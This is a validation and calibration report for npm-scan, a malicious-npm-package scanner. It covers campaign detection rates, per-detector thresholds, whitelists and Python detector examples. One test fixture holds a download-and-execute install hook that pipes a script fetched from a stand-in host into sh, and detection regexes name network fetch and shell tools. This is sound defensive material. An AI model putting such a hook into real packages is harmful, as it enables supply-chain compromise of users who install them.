npm-scan/VALIDATION.md at main · lateos-ai/npm-scan · GitHub
# npm-scan Validation & Calibration Report

- **Date:** 2026-06-03
- **Detectors validated:** TIER1-VERSION-ANOMALY, TIER1-OBFUSCATION-HEURISTICS, TIER1-LIFECYCLE-HOOK, TIER1-BINARY-EMBED, TIER1-TYPOSQUAT, TIER1-INFOSTEALER
- **Campaigns tested:** 3 real May 2026 attack vectors
- **Packages analyzed:** 7 (validation) + 1,000 (calibration)
## Campaign Detection Rates

| Campaign | Detection rate | Expected-detector match |
| --- | --- | --- |
| 176-Package Dependency Confusion | 100.0% | 71.4% |
| Mini Shai-Hulud (Obfuscated) | 100.0% | 60.0% |
| Bitwarden CLI Impersonation | 100.0% | 60.0% |

Every campaign package triggered at least one expected detector. The expected-detector match rate is lower than the detection rate because some of the detectors expected for each package (TIER1-BINARY-EMBED, and the exact-pattern signatures of TIER1-INFOSTEALER) need file content, and the fixtures carry only package metadata.
## Detector Performance (Validation)

| Detector | Precision | Avg confidence |
| --- | --- | --- |
| TIER1-LIFECYCLE-HOOK | 100.0% | 92.5 |
| TIER1-VERSION-ANOMALY | 100.0% | 92.0 |
| TIER1-OBFUSCATION-HEURISTICS | 100.0% | 80.0 |
| TIER1-TYPOSQUAT | 50.0% | 68.8 |
## Threshold Calibration

Pre-calibration: a single global confidence threshold of 70 for every detector.

Post-calibration: per-detector flag and warn thresholds derived from the analysis below.

| Detector | Flag | Warn | Calibration basis |
| --- | --- | --- | --- |
| TIER1-TYPOSQUAT | 85 | 70 | 46 edit-distance=1 FPs on scoped sub-packages eliminated at 85 |
| TIER1-OBFUSCATION-HEURISTICS | 75 | 60 | Bundlers/transpilers exempt via whitelist |
| TIER1-VERSION-ANOMALY | 72 | 60 | Sentinel patterns always flag at 92 |
| TIER1-BINARY-EMBED | 80 | 65 | Cross-platform binary sets rare in legitimate packages |
| TIER1-LIFECYCLE-HOOK | 65 | 50 | Moderate threshold for hooks |
| TIER1-INFOSTEALER | 72 | 55 | Pattern-based C2 signatures |
| TIER1-METADATA-SPOOF | 70 | 55 | Namespace/repo URL spoofing |
| TIER1-VERSION-CONFUSION | 75 | 60 | High-version heuristics |
| TIER1-CLOUD-IMDS | 80 | 65 | IMDS targeting rarely legitimate |
| TIER1-MULTISTAGE-POSTINSTALL | 75 | 60 | Two-stage download+exec |
| TIER1-SLSA-ATTESTATION | 85 | 70 | Placeholder |
False-positive calibration on the top 1,000 npm packages, sweeping the confidence threshold:

- Threshold 70: 47 FPs (4.7%), all TIER1-TYPOSQUAT edit-distance=1 hits on scoped sub-packages
- Threshold 76: 2 FPs (0.2%), @commitlint/read and preact (both now whitelisted)
- Threshold 85: 0 FPs (0.0%), well under the 2% target
Whitelist additions (the 14 packages below, across 4 detectors):

- Bundlers/minifiers (webpack, terser, uglify-js, browserify, rollup, esbuild) → TIER1-OBFUSCATION-HEURISTICS
- Transpilers (typescript, @babel/core) → TIER1-OBFUSCATION-HEURISTICS
- Utility libraries (lodash, underscore, crypto-js) → TIER1-OBFUSCATION-HEURISTICS
- Date library (moment) → TIER1-BINARY-EMBED
- Edit-distance-1 near-misses (preact, @commitlint/read) → TYPOSQUAT_VPMDHAJ / TIER1-TYPOSQUAT
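The policy change described in this section, as an added worked example rather than npm-scan's own code: the flag/warn thresholds and the detector-scoped whitelist below are copied from the calibration table, while every finding (package names such as `@scope/sub-package-a` and `evil-lodahs`, and their confidences) is constructed for illustration. The point of the comparison is that per-detector thresholds move the bar in both directions: the typosquat bar goes up to 85 to drop the edit-distance=1 class, while the lifecycle-hook bar drops to 65 and catches a finding the global 70 would have passed.

```python
# Added example (not npm-scan's own code): apply the per-detector flag/warn
# thresholds and detector-scoped whitelist from the calibration table to a set
# of findings, and compare with the pre-calibration global threshold of 70.
# The thresholds and whitelist entries come from the table; every finding
# below, its package name and its confidence, is constructed for illustration.
from dataclasses import dataclass

GLOBAL_THRESHOLD = 70  # pre-calibration: one bar for every detector

# (flag, warn) per detector, from the post-calibration table.
THRESHOLDS = {
    "TIER1-TYPOSQUAT": (85, 70),
    "TIER1-OBFUSCATION-HEURISTICS": (75, 60),
    "TIER1-VERSION-ANOMALY": (72, 60),
    "TIER1-BINARY-EMBED": (80, 65),
    "TIER1-LIFECYCLE-HOOK": (65, 50),
    "TIER1-INFOSTEALER": (72, 55),
    "TIER1-METADATA-SPOOF": (70, 55),
    "TIER1-VERSION-CONFUSION": (75, 60),
    "TIER1-CLOUD-IMDS": (80, 65),
    "TIER1-MULTISTAGE-POSTINSTALL": (75, 60),
    "TIER1-SLSA-ATTESTATION": (85, 70),
}

# Whitelist keyed by detector: webpack is exempt from the obfuscation
# heuristics only, so a typosquat or lifecycle-hook hit on it still counts.
WHITELIST = {
    "TIER1-OBFUSCATION-HEURISTICS": {
        "webpack", "terser", "uglify-js", "browserify", "rollup", "esbuild",
        "typescript", "@babel/core", "lodash", "underscore", "crypto-js",
    },
    "TIER1-BINARY-EMBED": {"moment"},
    "TIER1-TYPOSQUAT": {"preact", "@commitlint/read"},
}


@dataclass(frozen=True)
class Finding:
    package: str
    detector: str
    confidence: int  # 0-100


def verdict(f: Finding, per_detector: bool = True, use_whitelist: bool = True) -> str:
    """Return 'whitelisted', 'flag', 'warn' or 'pass' for one finding.

    per_detector=False reproduces the pre-calibration policy (global 70).
    A detector missing from THRESHOLDS falls back to the global bar rather
    than silently passing.
    """
    if use_whitelist and f.package in WHITELIST.get(f.detector, ()):
        return "whitelisted"
    if per_detector:
        flag, warn = THRESHOLDS.get(f.detector, (GLOBAL_THRESHOLD, GLOBAL_THRESHOLD))
    else:
        flag, warn = GLOBAL_THRESHOLD, GLOBAL_THRESHOLD
    if f.confidence >= flag:
        return "flag"
    if f.confidence >= warn:
        return "warn"
    return "pass"


def flagged(findings, per_detector=True, use_whitelist=True):
    """Package names that reach 'flag' under the chosen policy, in input order."""
    return [f.package for f in findings
            if verdict(f, per_detector, use_whitelist) == "flag"]


# Constructed findings modelled on the calibration run. The two @scope names
# and their 72/74 confidences stand in for the edit-distance=1 scoped
# sub-package FP class; 'evil-lodahs' is a hypothetical real typosquat.
SAMPLE_FINDINGS = [
    Finding("@scope/sub-package-a", "TIER1-TYPOSQUAT", 72),
    Finding("@scope/sub-package-b", "TIER1-TYPOSQUAT", 74),
    Finding("preact", "TIER1-TYPOSQUAT", 80),
    Finding("webpack", "TIER1-OBFUSCATION-HEURISTICS", 78),
    Finding("evil-lodahs", "TIER1-TYPOSQUAT", 91),
    Finding("acme-internal-utils", "TIER1-VERSION-ANOMALY", 92),
    Finding("some-cli", "TIER1-LIFECYCLE-HOOK", 68),
]


def compare(findings=SAMPLE_FINDINGS) -> dict:
    """Number of flagged packages under the old and new policies."""
    return {
        "global-70": len(flagged(findings, per_detector=False, use_whitelist=False)),
        "per-detector+whitelist": len(flagged(findings)),
    }


if __name__ == "__main__":
    for f in SAMPLE_FINDINGS:
        print(f"{f.package:24} {f.detector:30} {f.confidence:3}  "
              f"global-70={verdict(f, False, False):11} calibrated={verdict(f)}")
    print(compare())
```

Run stand-alone it prints one line per finding with both verdicts; the global policy flags six of the seven (everything but the hook at 68), the calibrated policy flags three (the hypothetical squat, the sentinel-version hit, and the hook at 68 that the old bar missed). Keying the whitelist by detector is deliberate: a blanket allow-list for webpack would also suppress a future lifecycle-hook or metadata-spoof finding against a compromised release of it.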
## Campaign Coverage Analysis

### Campaign 1: Dependency Confusion (sentinel versions)

- TIER1-VERSION-ANOMALY catches all three sentinel versions (99.99.99, 11.11.11, 10.10.10) at 92% confidence
- TIER1-LIFECYCLE-HOOK fires on the postinstall/preinstall scripts at 70-100%
- TIER1-BINARY-EMBED does not fire (the fixture data contains no binary files)
- Additional coverage: TIER1-VERSION-CONFUSION fires at 85/65/65

### Campaign 2: Mini Shai-Hulud (obfuscation)

- TIER1-OBFUSCATION-HEURISTICS fires on both packages, at 90% and 70%
- TIER1-LIFECYCLE-HOOK fires on @antv/core at 100%
- TIER1-INFOSTEALER does not fire (the fixture scripts lack the exact pattern signatures)
- Additional coverage: TIER1-TYPOSQUAT fires at 75-100%, and the MINI_SHAI_HULUD campaign detector fires

### Campaign 3: Bitwarden Impersonation

- TIER1-LIFECYCLE-HOOK fires on the second wave at 100%
- TIER1-TYPOSQUAT fires at 50%, below its flag threshold of 85
- TIER1-OBFUSCATION-HEURISTICS does not fire on the first wave (the script is not obfuscated enough to cross the heuristic)
- Additional coverage: the TRAPDOOR and TYPOSQUAT_VPMDHAJ detectors fire on the second wave
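The Campaign 1 signals above, as an added example that is not npm-scan's own detector code: metadata-only stand-ins for TIER1-VERSION-ANOMALY (sentinel versions), TIER1-LIFECYCLE-HOOK and TIER1-MULTISTAGE-POSTINSTALL, run over constructed package.json fixtures. Dependency-confusion packages carry versions like 99.99.99 so that the public package outranks any internal build of the same name; the regexes, the per-component floor of 10, the confidence values (92, 70-100, 80) and the fixture names and URL are all assumptions chosen to land where the report says these detectors fire.

```python
# Added example (not npm-scan's own code): metadata-only versions of three of
# the signals used above against the dependency-confusion fixtures: sentinel
# versions, install-time lifecycle hooks, and a two-stage download+exec hook.
# The regexes and the confidence values (92 / 70-100 / 80) are assumptions
# chosen to match where the report says these detectors fire; the package.json
# fixtures are constructed, not campaign samples.
import json
import re

# 99.99.99, 11.11.11, 10.10.10: all three components identical.
SENTINEL_RE = re.compile(r"^(\d+)\.\1\.\1$")
# Fetch-from-network indicators in an install script.
DOWNLOAD_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b|https?://", re.I)
# Execute-what-was-fetched indicators.
EXEC_RE = re.compile(
    r"\|\s*(sh|bash|node)\b|\bsh\s+-c\b|\bnode\s+-e\b|\beval\b|chmod\s+\+x", re.I)
HOOKS = ("preinstall", "install", "postinstall", "prepare")


def version_anomaly(version: str) -> int:
    """TIER1-VERSION-ANOMALY stand-in: sentinel version -> 92, else 0.

    1.1.1 or 2.2.2 are ordinary releases, so the floor of 10 per component
    is an assumption to keep those out of the sentinel class.
    """
    m = SENTINEL_RE.match(version.strip())
    return 92 if m and int(m.group(1)) >= 10 else 0


def lifecycle_hook(scripts: dict) -> int:
    """TIER1-LIFECYCLE-HOOK stand-in: any install-time hook scores 70; a hook
    that touches the network or spawns a shell/eval scores 100."""
    best = 0
    for hook in HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        risky = DOWNLOAD_RE.search(cmd) or EXEC_RE.search(cmd)
        best = max(best, 100 if risky else 70)
    return best


def multistage_postinstall(scripts: dict) -> int:
    """TIER1-MULTISTAGE-POSTINSTALL stand-in: one hook that both downloads
    and executes (stage 1 fetches, stage 2 runs) scores 80."""
    for hook in HOOKS:
        cmd = scripts.get(hook, "")
        if DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
            return 80
    return 0


def scan(package_json: str) -> dict:
    """Run the three detectors over a package.json document; only detectors
    with a non-zero confidence appear in the result."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    results = {
        "TIER1-VERSION-ANOMALY": version_anomaly(str(pkg.get("version", ""))),
        "TIER1-LIFECYCLE-HOOK": lifecycle_hook(scripts),
        "TIER1-MULTISTAGE-POSTINSTALL": multistage_postinstall(scripts),
    }
    return {name: conf for name, conf in results.items() if conf}


# Constructed fixtures (hypothetical package names and URL).
CONFUSION_FIXTURE = json.dumps({
    "name": "acme-internal-utils",
    "version": "99.99.99",
    "scripts": {"preinstall": "curl -s https://example.invalid/s.sh | sh"},
})
HOOK_ONLY_FIXTURE = json.dumps({
    "name": "some-cli",
    "version": "11.11.11",
    "scripts": {"postinstall": "node scripts/setup.js"},
})
BENIGN_FIXTURE = json.dumps({
    "name": "tiny-lib",
    "version": "1.1.1",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
})

if __name__ == "__main__":
    for label, fixture in [("confusion", CONFUSION_FIXTURE),
                           ("hook-only", HOOK_ONLY_FIXTURE),
                           ("benign", BENIGN_FIXTURE)]:
        print(label, scan(fixture))
```

The hook-only fixture is the interesting middle case: its postinstall runs a file shipped inside the tarball rather than fetching anything, so the lifecycle detector fires at the low end of its range and the multistage detector stays silent. Deciding whether `scripts/setup.js` is itself a dropper needs the file content, which is exactly the gap the expected-match column in the campaign table is accounting for.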
## Test Suite

690 total...